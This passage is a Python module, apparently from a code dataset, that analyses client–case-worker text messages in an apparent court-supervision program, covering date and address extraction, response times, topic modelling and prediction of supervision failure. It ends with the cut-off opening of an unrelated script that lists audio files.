r'(?i)(?<=\\blocated|\\bat[\\s*])([0-9]{1,}.*?MD)(\\s[0-9]{5})?'\nphone_pattern = r'(\\+\\d{1,2}\\s)?\\(?\\d{3}\\)?[\\s.-]?\\d{3}[\\s.-]?\\d{4}'\n\n# ***** functions to load data and apply timezone ************\n\ndef apply_tz(df,col_name,tz_read='UTC',tz_target='US/Eastern'):\n \"\"\" Function to convert to a target timezone. \"\"\"\n df[col_name] = df[col_name].dt.tz_localize(tz_read).dt.tz_convert(tz_target)\n return df\n\ndef make_hour_day(df,col_name):\n \"\"\" Function to extract weekday and hour from a time field. 
\"\"\"\n df['weekday'] = df[col_name].dt.weekday\n df['weekday_name'] = df[col_name].dt.weekday_name\n df['hour'] = df[col_name].dt.hour\n return df\n\ndef rows_missing(df1,df2,col_name):\n \"\"\" Function to find rows that are not in two data frames.\n Uses the pd.merge(...,indicator=True) option. \"\"\"\n df_out = pd.merge(df1,df2,on=col_name,how='left',indicator=True).query('_merge == \"left_only\"')\n return df_out\n\ndef load_messages(fname):\n messages = pd.read_csv(fname, parse_dates=['created_at','send_at','client_created_at'])\n messages = apply_tz(messages,'created_at',tz_read='Etc/GMT-7',tz_target='US/Eastern')\n messages = apply_tz(messages,'send_at',tz_read='Etc/GMT-7',tz_target='US/Eastern')\n messages = apply_tz(messages,'client_created_at',tz_read='Etc/GMT-7',tz_target='US/Eastern')\n return messages\n\ndef load_surveys(fname):\n surveys = pd.read_csv(fname, parse_dates=['survey_created_at'])\n surveys = apply_tz(surveys,'survey_created_at',tz_read='Etc/GMT-7',tz_target='US/Eastern')\n return surveys\n\ndef load_surveys_single(fname):\n \"\"\" Loads survey data with single responses. \"\"\"\n surveys = load_surveys(fname)\n surveys['survey_created_at'] = surveys['survey_created_at'].apply(lambda x: x.round('s'))\n surveys_single = (surveys\n .groupby(['client_id','user_id'])[['survey_created_at']]\n .nunique()\n .rename(columns={'survey_created_at':'ncounts'})\n .query('ncounts == 1')\n .reset_index())\n return pd.merge(surveys_single.drop('ncounts',axis=1),surveys,on=['client_id','user_id'],how='left')\n\ndef map_surveys_to_sf(surveys_in):\n surveys = surveys_in.copy()\n surveys['supervision_failure'] = (surveys['survey_response_id'].map({1:False,2:True,3:True,4:True}))\n return surveys\n\n\n# ***** functions for basic processing ************\n\ndef calc_number_messages_exchanged(messages):\n \"\"\" Gives the number of messages sent and received. 
\"\"\"\n msg_outbound = (messages.query('inbound == False')\n .groupby(['client_id','user_id'])[['id']]\n .count())\n msg_inbound = (messages.query('inbound == True')\n .groupby(['client_id','user_id'])[['id']]\n .count())\n \n msg_exchanged = pd.concat([msg_outbound,msg_inbound],axis=1).fillna(0)\n msg_exchanged.columns = ['counts_outbound','counts_inbound']\n msg_exchanged['inout_ratio'] = msg_exchanged['counts_inbound'] / msg_exchanged['counts_outbound']\n \n # handle cases with outbound = 0\n msg_exchanged[np.isinf(msg_exchanged['inout_ratio'])] = 0.0\n \n return msg_exchanged\n\ndef find_dates_in_string(string,pattern,tz_info,show_result=False):\n \"\"\" Extract possible dates from a text string.\n Also, must add time zone information from corresponding sent message.\"\"\"\n\n # make sure input is string\n if not isinstance(string,str):\n return []\n \n string_matches = re.findall(pattern, string)\n dates_ext = []\n for match in string_matches:\n if show_result: print(match)\n date_matches = datefi.find_dates(match)\n # since the returned date is of type datetime.datetime,\n # need to convert to Timestamp format for comparison\n # also limit years to UNIX time\n for date_match in date_matches:\n if (date_match.year > 1970) & (date_match.year < 2038):\n if show_result: print(date_match, date_match.timestamp())\n dates_ext.append(pd.Timestamp(date_match.timestamp(),unit='s',tz=tz_info))\n return dates_ext\n\ndef find_dates_in_row(row):\n row['dates_ext'] = find_dates_in_string(row['body'],date_pattern,row['send_at'].tzinfo)\n return row\n\ndef compare_dates(string,string_target):\n \"\"\" Compare dates, drop times less than the target.\n Also, drop times that are 30 days into the future. 
\"\"\"\n sext = []\n for s in string:\n if (s >= string_target) & (s <= string_target+pd.Timedelta(days=30)):\n sext.append(s)\n return sext\n\ndef compare_dates_in_row(row):\n return [compare_dates(row['dates_ext'],row['send_at'])]\n\ndef find_addresses_in_string(string,pattern):\n addresses = []\n\n # make sure input is string\n if not isinstance(string,str):\n return addresses\n \n string_matches = re.findall(pattern,string)\n for match in string_matches:\n addresses.append(match[0]+match[1])\n\n return addresses\n\ndef find_addresses_in_row(row):\n return [find_addresses_in_string(row['body'],address_pattern)]\n\ndef map_word_exist(string,word_str):\n \"\"\" Indicate if the word exists. \"\"\"\n pattern = '(?i)'+word_str\n pattern_raw = r'%s'%pattern\n return 1 if len(find_pattern_in_string(string,pattern_raw)) else 0\n\ndef find_pattern_in_string(string,pattern):\n str_matches = []\n \n # make sure input is string\n if not isinstance(string,str):\n return str_matches\n \n matches = re.findall(pattern,string)\n for match in matches:\n str_matches.append(match)\n \n return str_matches\n\ndef find_pattern_in_row(row,pattern):\n return [find_pattern_in_string(row['body'],pattern)]\n\ndef find_phones_in_row(row):\n return [find_pattern_in_string(row['body'],phone_pattern)]\n\ndef convert_to_hr(dfin,col_name,col_target_name):\n \"\"\" Converts timestamp into hours. Used for plotting and modeling. \"\"\"\n df = dfin.copy()\n df[col_target_name] = (df[df[col_name].notnull()][col_name]\n /pd.Timedelta(hours=1))\n return df\n\ndef convert_to_log(dfin,col_name,col_target_name):\n \"\"\" Take the natural logarithm of the input column. \"\"\"\n df = dfin.copy()\n df[col_target_name] = df[col_name].apply(lambda x: np.log(x + 1.e-4))\n return df\n\ndef calc_messages_counts(messages,col_name='send_at'):\n \"\"\" Calculates message counts per relationship per weekday and hour of day.\n Depends on the time input column. 
\"\"\"\n messages_time = messages[['id','client_id','user_id','send_at','inbound']]\n messages_time = make_hour_day(messages_time.copy(),col_name)\n messages_inbound_counts = (messages_time.query('inbound == True')\n .drop('inbound',axis=1)\n .groupby(['client_id','user_id','weekday','hour'])[[col_name]]\n .count()\n .rename(columns={col_name:'inbound_msg_counts'}))\n \n messages_outbound_counts = (messages_time.query('inbound == False')\n .drop('inbound',axis=1)\n .groupby(['client_id','user_id','weekday','hour'])[[col_name]]\n .count()\n .rename(columns={col_name:'outbound_msg_counts'}))\n\n messages_counts = pd.concat([messages_inbound_counts,messages_outbound_counts],axis=1).fillna(0).reset_index()\n \n return messages_counts\n\ndef calc_messages_counts_sum(messages):\n messages_counts = calc_messages_counts(messages,col_name='send_at')\n return messages_counts.groupby(['client_id','user_id'])[['inbound_msg_counts','outbound_msg_counts']].sum()\n\ndef count_words_per_group(messages,pattern):\n return messages['body'].apply(lambda x: 1 if len(find_pattern_in_string(x,pattern)) else 0).sum()\n\ndef count_messages_with_pattern(messages,pattern):\n \"\"\" Count messages with a specific pattern. \"\"\"\n wordcounts = messages.groupby(['client_id','user_id']).apply(lambda x: count_words_per_group(x,word_pattern))\n return pd.DataFrame(wordcounts,columns=['msg_word_counts'],index=wordcounts.index)\n\ndef exclude_elem(x,to_exclude):\n return False if (x in to_exclude) else True\n\ndef include_elem(x,to_include):\n return True if (x in to_include) else False\n\ndef exclude_from_list(x,to_exclude):\n \"\"\" Removes elements given a list. \"\"\"\n return [s for s in filter(lambda y: exclude_elem(y,to_exclude), x)]\n\n# ***** functions dealing with response times ************\n\ndef calc_median_response_time_diff_per_group(messages):\n \"\"\" Calculates the median time difference between\n sent and received messages. Need to improve on the time calculation. 
\"\"\"\n \n # reset index to apply operation within group\n messages = messages.sort_values('send_at',ascending=True).reset_index(drop=True)\n \n # loop over all messages send dates\n tdiff = []\n for i in range(len(messages)):\n #print(i,messages.loc[i,['inbound','send_at']])\n if i == 0:\n date_prev = messages.loc[i,'send_at']\n stat_prev = messages.loc[i,'inbound']\n if stat_prev != messages.loc[i,'inbound']:\n tdiff.append(messages.loc[i,'send_at'] - date_prev)\n date_prev = messages.loc[i,'send_at']\n stat_prev = messages.loc[i,'inbound']\n\n return [np.median(tdiff),np.amax(tdiff)] if tdiff else [pd.NaT,pd.NaT]\n\ndef calc_median_response_time_diff_all(messages):\n \"\"\" Calculates the median response time per relationship. \"\"\"\n median_response_time = messages.groupby(['client_id','user_id']).apply(calc_median_response_time_diff_per_group)\n return pd.DataFrame(median_response_time.values.tolist(),columns=['median_response_time','max_response_time'],index=median_response_time.index)\n\n# The following paired functions can be combined!\ndef calc_median_response_time_user_to_client(messages):\n \"\"\" Calculates the median response times from user to client. \"\"\"\n messages = messages.sort_values('send_at',ascending=True).reset_index(drop=True)\n \n tdiff = []\n date_prev = pd.NaT\n for i in range(len(messages)):\n if messages.loc[i,'inbound'] == True:\n date_prev = messages.loc[i,'send_at']\n if (messages.loc[i,'inbound'] == False) & (not pd.isna(date_prev)):\n tdiff.append(messages.loc[i,'send_at'] - date_prev)\n date_prev = pd.NaT\n \n return [np.median(tdiff), np.amax(tdiff)] if tdiff else [pd.NaT, pd.NaT]\n\ndef calc_median_response_time_client_to_user(messages):\n \"\"\" Calculates the median response times from client and user. 
\"\"\"\n messages = messages.sort_values('send_at',ascending=True).reset_index(drop=True)\n \n tdiff = []\n date_prev = pd.NaT\n for i in range(len(messages)):\n if messages.loc[i,'inbound'] == False:\n date_prev = messages.loc[i,'send_at']\n if (messages.loc[i,'inbound'] == True) & (not pd.isna(date_prev)):\n tdiff.append(messages.loc[i,'send_at'] - date_prev)\n date_prev = pd.NaT\n \n return [np.median(tdiff), np.amax(tdiff)] if tdiff else [pd.NaT, pd.NaT]\n\ndef calc_median_response_time_diff(messages):\n \"\"\" Calculates the median response time per relationship.\n Distinguishes between use to client and client to user. \"\"\"\n median_response_time_user_to_client = messages.groupby(['client_id','user_id']).apply(calc_median_response_time_user_to_client)\n median_response_time_client_to_user = messages.groupby(['client_id','user_id']).apply(calc_median_response_time_client_to_user)\n median_response_time_user_to_client = pd.DataFrame(median_response_time_user_to_client.values.tolist(),\n columns=['uc_median_response_time','uc_max_response_time'],\n index=median_response_time_user_to_client.index)\n median_response_time_client_to_user = pd.DataFrame(median_response_time_client_to_user.values.tolist(),\n columns=['cu_median_response_time','cu_max_response_time'],\n index=median_response_time_client_to_user.index)\n return pd.concat([median_response_time_user_to_client,median_response_time_client_to_user],axis=1)\n\n# ***** functions dealing with response times (old functions) ************\n\ndef calc_median_response_time_per_group(df,grp_names):\n \"\"\" Apply a function per defined group. 
Written for grp_names=['client_id','user_id'] \"\"\"\n df_grp = df.groupby(grp_names)\n time_diff_key = []\n time_diff_val = []\n for key,group in df_grp:\n tval = calc_median_response_time_per_relation(group)\n time_diff_key.append(key)\n time_diff_val.append(tval)\n return pd.DataFrame(\n pd.Series(time_diff_val,index=pd.MultiIndex.from_tuples(time_diff_key,names=grp_names)),\n columns=['median_time'])\n\ndef calc_median_response_time_per_relation(df_uc):\n \"\"\" Calculates the median time per defined relation. \"\"\"\n if df_uc['time_diff_response'].notnull().any():\n tval = df_uc['time_diff_response'].median()\n else:\n tval = np.nan\n return tval\n\ndef find_index_outbound(df):\n index_inbound = df.query('inbound == True').index.values # find inbound indices\n # need to iterate backwards until find entry with 'inbound == False'\n index_outbound = []\n for n in index_inbound:\n for k in range(n, - 1, -1):\n if (df.loc[k,'inbound'] == False) & (df.loc[k,'sent'] == True):\n #print(k,df.loc[k,'inbound'])\n break\n index_outbound.append(k)\n return index_inbound, np.array(index_outbound)\n\ndef get_response_timelag(df):\n \"\"\" Calculates the time lag between sent and received message. \"\"\"\n # function requires index manipulation, hence .reset_index is called,\n # which is not ideal with groupby\n df = df.sort_values('send_at').reset_index(drop=True)\n index_inbound, index_outbound = find_index_outbound(df)\n df['time_diff_response'] = pd.Series(df.loc[index_inbound,'send_at'].values - df.loc[index_outbound,'send_at'].values,\n index=index_inbound)\n return df\n\ndef calc_median_response_time(df):\n \"\"\" Calculates time difference per relation. 
\"\"\"\n col_select = ['id','client_id','user_id','body','inbound','send_at','sent']\n messages_time_diff = (df[col_select].groupby(['client_id','user_id'])\n .apply(get_response_timelag)\n .reset_index(drop=True))\n return calc_median_response_time_per_group(messages_time_diff,['client_id','user_id']).reset_index()\n\n# ***** functions dealing with scheduling ************\n\ndef calc_median_schedule_time_per_group(messages):\n # some times can be negative, will use the absolute value for now\n tdiff = np.abs(messages['send_at'].apply(lambda x: x.round('s')) - messages['created_at'].apply(lambda x: x.round('s')))\n return [np.median(tdiff), np.amax(tdiff)]\n\ndef calc_median_schedule_time(messages):\n median_schedule_time = messages.groupby(['client_id','user_id']).apply(calc_median_schedule_time_per_group)\n return (pd.DataFrame(median_schedule_time.values.tolist(),\n columns=['median_schedule_time','max_schedule_time'],index=median_schedule_time.index))\n\n# ***** functions dealing with finding report/court dates from text messages ************\n\ndef estimate_report_dates(messages,col_names):\n \"\"\" Estimates dates from text messages and provide an estimate for the next report dates. \"\"\"\n messages_send_dates = messages[col_names].copy()\n messages_send_dates['dates_ext'] = messages_send_dates.apply(find_dates_in_row,axis=1)['body']\n messages_send_dates['dates_est'] = messages_send_dates.apply(compare_dates_in_row,axis=1)['dates_ext']\n \n return messages_send_dates\n\ndef calc_median_report_time_diff_per_group(messages_send_dates):\n \"\"\" Calculates the median time difference between\n message send time and estimated report or court dates. 
\"\"\"\n \n # reset index to apply operation within group\n messages_send_dates.reset_index(drop=True,inplace=True)\n \n # loop over all estimated dates\n tdiff = []\n for i in range(len(messages_send_dates)):\n if messages_send_dates.loc[i,'dates_est']:\n for date_est in messages_send_dates.loc[i,'dates_est']:\n tdiff.append(date_est - messages_send_dates.loc[i,'send_at'])\n \n return [np.median(tdiff),len(tdiff)] if tdiff else [pd.NaT,0]\n\ndef calc_median_report_time_diff(messages):\n \"\"\" Calculates the median report time and number of possible report times per relationship. \"\"\"\n col_select = ['client_id','user_id','send_at','body']\n messages_send_dates = estimate_report_dates(messages,col_select)\n median_report_time = messages_send_dates.groupby(['client_id','user_id']).apply(calc_median_report_time_diff_per_group)\n return pd.DataFrame(median_report_time.values.tolist(),columns=['median_report_time','n_report_time'],index=median_report_time.index)\n\n# ***** functions dealing with topic classification in messages ************\n\ndef build_messages_vectorizer():\n \"\"\" Compile term frequency vectorizer \"\"\"\n tf_vectorizer = CountVectorizer(max_df=0.95, min_df=2, max_features=n_features,\n stop_words='english',\n token_pattern=r'[a-zA-Z\\-][a-zA-Z\\-]{2,}')\n return tf_vectorizer\n\ndef find_msg_topic(prob):\n \"\"\" Categorize messages into topic with the maximum probability.\n Assign 0 for uniform probabilities. \"\"\"\n if (prob == prob.max()).all():\n return [0,np.median(prob)]\n else:\n return [prob.argmax()+1,prob.max()] # add 1 to the topics to distinguish from 'unclassified' or uniform probability\n\ndef find_msg_topic_in_row(row,tf_in_vect,tf_out_vect,lda_in_model,lda_out_model):\n \"\"\" Models and vectorizer must be passed in. 
\"\"\"\n \n # select trained model depending on it sent or received\n if row['inbound']:\n model = lda_in_model\n tf_vectorizer = tf_in_vect\n else:\n model = lda_out_model\n tf_vectorizer = tf_out_vect\n \n if row.isnull()['body']:\n max_id, max_val = (0,0)\n else:\n max_id, max_val = find_msg_topic(model.transform(tf_vectorizer.transform([row['body']]))[0])\n return pd.Series({'topic_max':max_id,'topic_maxval':max_val})\n\ndef load_topic_model_components(messages):\n \"\"\" Loads topic model components into workspace. Must feed in the entire messages table. \"\"\"\n # loads text vectorizer\n tf_outbound_vectorizer = build_messages_vectorizer()\n tf_inbound_vectorizer = build_messages_vectorizer()\n \n messages_outbound = messages.query('inbound == False')\n messages_inbound = messages.query('inbound == True')\n \n data_samples_outbound = messages_outbound[messages_outbound['body'].notnull()]['body'].values\n data_samples_inbound = messages_inbound[messages_inbound['body'].notnull()]['body'].values\n \n # fit vectorizer to corresponding data\n tf_outbound = tf_outbound_vectorizer.fit_transform(data_samples_outbound)\n tf_inbound = tf_inbound_vectorizer.fit_transform(data_samples_inbound)\n \n # loads models\n lda_outbound_model = pickle.load(open(fname_outbound_topic_model, 'rb'))\n lda_inbound_model = pickle.load(open(fname_inbound_topic_model, 'rb'))\n \n \n return [lda_outbound_model, lda_inbound_model,\n tf_outbound_vectorizer, tf_inbound_vectorizer,\n tf_outbound, tf_inbound]\n\ndef print_top_words(model, feature_names, n_top_words):\n for topic_idx, topic in enumerate(model.components_):\n message = \"Topic #%d: \" % topic_idx\n message += \" \".join([feature_names[i]\n for i in topic.argsort()[:-n_top_words - 1:-1]])\n print(message)\n print()\n\ndef show_top_words(model,label='',show_result=False):\n \"\"\" Topic ordering is model dependent, which in turn is data dependent. 
\"\"\"\n for topic_idx, topic in enumerate(model.components_):\n # arsort() sorts by increasing probabilities\n top_words_idx = topic.argsort()[:-n_top_words - 1:-1]\n top_words = [tf_feature_names[i] for i in top_words_idx.tolist()]\n top_words_freq = np.sort(topic)[:-n_top_words - 1:-1]\n \n # plot results\n plt.figure(figsize=(10,6))\n sns.barplot(y=top_words,x=top_words_freq)\n #plt.xticks(rotation=60)\n plt.ylabel('Word')\n plt.xlabel('Topic '+label+' '+str(topic_idx+1)+'\\nWord frequency')\n fout = 'topic_'+label+'_'+str(topic_idx+1)+'.png'\n plt.savefig(fout,dpi=200)\n if show_result: plt.show()\n plt.close()\n \ndef map_messages_topics(messages,tf_in_vect,tf_out_vect,lda_in_model,lda_out_model):\n \"\"\" Determines the topic from each messages.\n Classify sent and received messages according to respective models. \"\"\"\n \n messages_topics = (messages[['body','inbound']]\n .apply(lambda row: find_msg_topic_in_row(row,tf_in_vect,tf_out_vect,lda_in_model,lda_out_model),axis=1))\n \n return messages.merge(messages_topics,left_index=True,right_index=True)\n\n\ndef show_messages_sequence(messages_uc,user_id,client_id,show_result=False):\n \"\"\" Show message sequence for a relationship. 
\"\"\"\n \n # select only a relationship\n messages_uc = messages_uc.query('client_id == @client_id and user_id == @user_id').sort_values('send_at').reset_index(drop=True)\n \n # separate into sent and received\n messages_inbound = messages_uc.query('inbound == True')\n messages_outbound = messages_uc.query('inbound == False')\n \n # plot commands\n plt.figure(figsize=(10,6))\n # +0.01 in the size label is to plot NaN messages\n if 'topic_max' in messages_uc.columns:\n plt.scatter(messages_outbound['send_at'].values,\n messages_outbound['topic_max'].values,\n s=(messages_outbound['topic_maxval']+0.01)*200,c='red',label='sent',alpha=0.4)#,c=messages_sample['inbound'].values)\n plt.scatter(messages_inbound['send_at'].values,\n messages_inbound['topic_max'].values,\n s=(messages_inbound['topic_maxval']+0.01)*200,c='blue',label='received',alpha=0.4)\n plt.plot(messages_uc['send_at'].values,messages_uc['topic_max'].values,\n marker='',linestyle='-',color='black',alpha=0.4)\n \n if 'dates_est' in messages_uc.columns:\n for elem in messages_uc['dates_est']:\n for xc in elem:\n plt.axvline(x=xc,color='green',alpha=0.4) # plot vertical lines for estimated court dates\n plt.xlabel('Date')\n plt.ylabel('Topic')\n plt.legend()\n plt.xlim([messages_uc['send_at'].min()-pd.Timedelta(days=2), messages_uc['send_at'].max()+pd.Timedelta(days=2)])\n plt.title('user: ' + str(user_id) + ' client: ' + str(client_id))\n plt.savefig('messages_topics_u'+str(user_id)+'_c'+str(client_id)+'.png',dpi=200)\n if show_result: plt.show()\n plt.close()\n\ndef map_messages_topics_list(messages,uc_list,estimate_date=False):\n \"\"\" Maps messages topics for a list of user and client.\n Outputs corresponding messages and plot. 
\"\"\"\n \n # loads topic model\n [lda_outbound_model, lda_inbound_model,\n tf_outbound_vectorizer, tf_inbound_vectorizer,\n tf_outbound, tf_inbound] = load_topic_model_components(messages)\n \n for client_id, user_id in uc_list:\n messages_sample = messages.query('client_id == @client_id and user_id == @user_id').sort_values('send_at').reset_index(drop=True)\n messages_sample = map_messages_topics(messages_sample,\n tf_inbound_vectorizer,tf_outbound_vectorizer,\n lda_inbound_model,lda_outbound_model)\n messages_sample[['inbound','send_at','body','topic_max','topic_maxval']].to_csv('messages_u'+str(user_id)+'_c'+str(client_id)+'.csv',index=False)\n \n # add annotations for estimated report/court dates\n if estimate_date:\n messages_sample = estimate_report_dates(messages_sample,messages_sample.columns)\n \n show_messages_sequence(messages_sample,user_id,client_id,show_result=False)\n\n\ndef count_topics_excluding_per_group(messages_topics,exclude_list=[]):\n \"\"\" Counts number of topics that are not in the exclude_list. \"\"\"\n return len(set(exclude_from_list(messages_topics['topic_max'],exclude_list)))\n\ndef calc_mode_topic_per_group(messages_topics):\n \"\"\" Calculates the most frequent topic. Also, takes into account the probability. \"\"\"\n if messages_topics.isnull()['topic_max'].any():\n return np.nan\n \n mode_val = messages_topics['topic_max'].mode().values\n \n if len(mode_val) == 1:\n return mode_val[0]\n elif len(mode_val) > 1:\n mode_val_mask = messages_topics['topic_max'].isin(mode_val)\n mode_val_loc = messages_topics[mode_val_mask]['topic_maxval'].idxmax()\n mode_val = messages_topics.loc[mode_val_loc,'topic_max']\n elif len(mode_val) == 0:\n mode_val = np.nan\n\n return mode_val\n\ndef calc_median_topics(messages,outbound_exclude_list=[],inbound_exclude_list=[]):\n \"\"\" Calculates the median topic values per conversation.\n Returns inbound/outbound median topics, number of topics, and number of topics excluding specified topics. 
\"\"\"\n [lda_outbound_model, lda_inbound_model,\n tf_outbound_vectorizer, tf_inbound_vectorizer,\n tf_outbound, tf_inbound] = load_topic_model_components(messages)\n messages = map_messages_topics(messages,\n tf_inbound_vectorizer,tf_outbound_vectorizer,\n lda_inbound_model,lda_outbound_model)\n \n return pd.concat(join='outer',axis=1)\n\n outbound_topics_median = messages.query('inbound == False').groupby(['client_id','user_id'])['topic_max'].agg(['median','nunique'])\n outbound_topics_median.columns = ['outbound_median_topic','outbound_ntopics']\n outbound_ntopics_exclude = pd.DataFrame(messages.query('inbound == False').groupby(['client_id','user_id'])\n .apply(lambda x: count_topics_excluding_per_group(x,outbound_exclude_list)),\n columns=['outbound_ntopics_exclude'])\n inbound_topics_median = messages.query('inbound == True').groupby(['client_id','user_id'])['topic_max'].agg(['median','nunique'])\n inbound_topics_median.columns = ['inbound_median_topic','inbound_ntopics']\n inbound_ntopics_exclude = pd.DataFrame(messages.query('inbound == True').groupby(['client_id','user_id'])\n .apply(lambda x: count_topics_excluding_per_group(x,inbound_exclude_list)),\n columns=['inbound_ntopics_exclude'])\n return pd.concat([outbound_topics_median,outbound_ntopics_exclude,\n inbound_topics_median,inbound_ntopics_exclude], join='outer',axis=1)\n\ndef calc_mode_topics(messages):\n \"\"\" Calculates the mode topice values per conversation. 
\"\"\"\n [lda_outbound_model, lda_inbound_model,\n tf_outbound_vectorizer, tf_inbound_vectorizer,\n tf_outbound, tf_inbound] = load_topic_model_components(messages)\n messages = map_messages_topics(messages,\n tf_inbound_vectorizer,tf_outbound_vectorizer,\n lda_inbound_model,lda_outbound_model)\n \n outbound_topics_mode = pd.DataFrame(messages.query('inbound == False').groupby(['client_id','user_id'])\n .apply(calc_mode_topic_per_group), columns=['outbound_mode_topic'])\n outbound_ntopics = messages.query('inbound == False').groupby(['client_id','user_id'])['topic_max'].agg(['nunique'])\n outbound_ntopics.columns = ['outbound_ntopics']\n inbound_topics_mode = pd.DataFrame(messages.query('inbound == True').groupby(['client_id','user_id'])\n .apply(calc_mode_topic_per_group), columns=['inbound_mode_topic'])\n inbound_ntopics = messages.query('inbound == True').groupby(['client_id','user_id'])['topic_max'].agg(['nunique'])\n inbound_ntopics.columns = ['inbound_ntopics']\n\n return pd.concat([outbound_topics_mode,outbound_ntopics,inbound_topics_mode,inbound_ntopics],join='outer',axis=1)\n\n# ***** functions for supervision failure classification ************\n\ndef downsample_majority_class_to_sf(df):\n \"\"\" Due to the imbalance data set. Downsample the majority class into two categories.\n Two categories: supervision_failure == [True,False] \"\"\"\n \n # Separate majority and minority classes\n df_majority = df.query('supervision_failure == False')\n df_minority = df.query('supervision_failure == True')\n \n # Downsample majority class\n df_majority_downsampled = resample(df_majority, \n replace=False, # sample without replacement\n n_samples=len(df_minority)) # to match minority class\n #random_state=123) # reproducible results\n \n # Combine minority class with downsampled majority class\n return pd.concat([df_majority_downsampled, df_minority])\n\ndef print_feature_importance(tree_model,features):\n \"\"\" Prints out the predictive features. 
\"\"\"\n # http://scikit-learn.org/stable/auto_examples/ensemble/plot_forest_importances.html\n importances = tree_model.feature_importances_\n std = np.std([tree.feature_importances_ for tree in tree_model.estimators_], axis=0)\n indices = np.argsort(importances)[::-1]\n\n # Print the feature ranking\n print(\"Feature ranking:\")\n\n for f in range(len(features)):\n print(\"{:d}. feature {:d}: {} ({:f} +/- {:f})\"\n .format(f + 1, indices[f], \n features[indices[f]], importances[indices[f]], std[indices[f]]))\n\ndef scan_prob_each_feature(model,X,h,features,fidx,show_result=False,save_result=False):\n \"\"\" Calculates the probabilities by changing each feature value for all observations.\n Requires externally defined step sizes.\n Plots the ['mean','1st percentile','5th percentile','10th percentile','25th percentile','median'] \"\"\"\n \n Xmax = np.amax(X,axis=0)\n Xmin = np.amin(X,axis=0)\n\n X_copy = np.copy(X)\n\n print('Processing: ', features[fidx])\n \n xf = np.arange(Xmin[fidx],Xmax[fidx],h[fidx]) # range of feature values\n yf = np.zeros((len(xf),6))\n yf_arr = np.zeros((X.shape[0],len(xf)))\n \n # loop over each feature value\n for i in range(len(xf)):\n X_copy[:,fidx] = xf[i] # assign that feature value for all observations for that feature\n yprobi = model.predict_proba(X_copy)[:,0] # calculate probabilities\n yf[i,:] = [np.mean(yprobi),np.percentile(yprobi,1),np.percentile(yprobi,5),np.percentile(yprobi,10),np.percentile(yprobi,25),np.median(yprobi)]\n yf_arr[:,i] = yprobi\n \n # plot result\n if save_result | show_result:\n plt.figure(figsize=(16,10))\n plt.plot(xf,yf)\n for i in range(len(xf)):\n plt.scatter(xf[i]*np.ones(X.shape[0]),yf_arr[:,i],c='gray',alpha=0.2) # need to change to swarm plot for better visualization!\n plt.xlabel(features[fidx])\n plt.ylabel('Probabilities')\n plt.legend(['mean','1st percentile','5th percentile','10th percentile','25th percentile','median'])\n if save_result: 
plt.savefig('model_prob_'+features[fidx]+'.png',dpi=200)\n if show_result: plt.show()\n plt.close()\n \n return xf, yf, yf_arr\n\n# ***** functions for word count ************\n\ndef find_wordcount_in_string(string):\n \"\"\" Calculates word counts in a string. \"\"\"\n if isinstance(string,str):\n return len(string.split())\n else:\n return 0\n\ndef find_wordcount_per_group(messages):\n \"\"\" Calculates word counts in a group.\n Returns the median and maximum values. \"\"\"\n messages = messages.sort_values('send_at',ascending=True).reset_index(drop=True)\n \n wcount = []\n for i in range(len(messages)):\n wcount.append(find_wordcount_in_string(messages.loc[i,'body']))\n \n return [np.median(wcount), np.amax(wcount)] if wcount else [0,0]\n\ndef find_wordcount(messages):\n \"\"\" Counts words in text messages. \"\"\"\n outbound_median_wordcount = messages.query('inbound == False').groupby(['client_id','user_id']).apply(find_wordcount_per_group)\n inbound_median_wordcount = messages.query('inbound == True').groupby(['client_id','user_id']).apply(find_wordcount_per_group)\n \n outbound_counts = pd.DataFrame(outbound_median_wordcount.values.tolist(),\n columns=['outbound_median_wordcount','outbound_max_wordcount'],\n index=outbound_median_wordcount.index)\n inbound_counts = pd.DataFrame(inbound_median_wordcount.values.tolist(),\n columns=['inbound_median_wordcount','inbound_max_wordcount'],\n index=inbound_median_wordcount.index)\n \n return pd.concat([outbound_counts,inbound_counts],axis=1).fillna(0)\n\n# ***** functions for significance testing ************\n\ndef permutation_test_diff_means(x,y,nperm=10000):\n \"\"\" Calculates the p-value for the difference in means. 
\"\"\"\n # Compute difference of means\n empirical_diff_means = diff_of_means(x, y)\n\n # Draw permutation replicates\n perm_replicates = draw_perm_reps(x, y,\n diff_of_means, size=nperm)\n\n # Compute p-value\n p = np.sum(perm_replicates >= empirical_diff_means) / len(perm_replicates)\n \n return p\n\ndef distribution_test_diff_means(x,y,nperm=10000):\n \"\"\" Use the difference of means to test if data comes from same distribution. \"\"\"\n # Compute difference of means\n empirical_diff_means = diff_of_means(x, y)\n\n xy_concat = np.concatenate((x, y))\n\n # Initialize bootstrap replicates\n bs_replicates = np.empty(nperm)\n\n for i in range(nperm):\n # Generate bootstrap sample\n bs_sample = np.random.choice(xy_concat, size=len(xy_concat))\n \n # Compute replicate\n bs_replicates[i] = diff_of_means(bs_sample[:len(x)],\n bs_sample[len(x):])\n\n # Compute and print p-value: p\n p = np.sum(bs_replicates >= empirical_diff_means) / len(bs_replicates)\n \n return p\n\n \n # ***** functions for sentiment extraction ************\n\ndef find_sentiment_in_string(string):\n if isinstance(string,str):\n return list(TextBlob(string).sentiment[:])\n else:\n return [np.nan,np.nan]\n\ndef find_sentiment_in_group(messages):\n \"\"\" Find median, minimum, and maximum sentiments per relationship. 
\"\"\"\n pol = []\n sub = []\n for message in messages['body']:\n polt,subt = find_sentiment_in_string(message)\n pol.append(polt)\n sub.append(subt)\n \n if np.isnan(polt).all():\n return [np.nan, np.nan, np.nan, np.nan, np.nan]\n else:\n return [np.nanmedian(pol),np.nanmedian(sub),np.nanmin(pol),np.nanmax(pol),np.nanmax(sub)]\n\ndef find_sentiment(messages):\n median_sentiments = messages.groupby(['client_id','user_id']).apply(find_sentiment_in_group)\n return pd.DataFrame(median_sentiments.values.tolist(),\n columns=['median_polarity','median_subjectivity','min_polarity','max_polarity','max_subjectivity'],\n index=median_sentiments.index)\n","sub_path":"Baltimore.revisited/data/cfatools.py","file_name":"cfatools.py","file_ext":"py","file_size_in_byte":35954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"383539118","text":"from os import listdir\nfrom os.path import isfile, join\nimport sys\nimport argparse\nimport random\n\ndef _get_file_names(audio_dir):\n file_names = []\n for f in listdir(audio_dir):\n if f.endswith(\".wav\"):\n file_names.append(f)\n \n return file_names\n\ndef main():\n parser = argparse.ArgumentParser(description=None)\n parser.add_argument('--input_dir', type=str, required=True,\n help='Input Dir')\n parser.add_argument('--output_file', type=str, required=False,\n default=\"defense_data.txt\",\n help='Output File')\n \n args = parser.parse_args()\n while 